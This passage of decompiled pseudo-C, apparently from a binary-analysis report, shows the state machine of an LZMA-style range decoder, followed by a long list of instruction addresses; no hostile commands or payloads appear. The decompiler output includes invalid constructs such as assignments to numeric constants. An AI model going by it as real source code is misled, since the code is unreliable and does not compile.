											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x004075e5
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
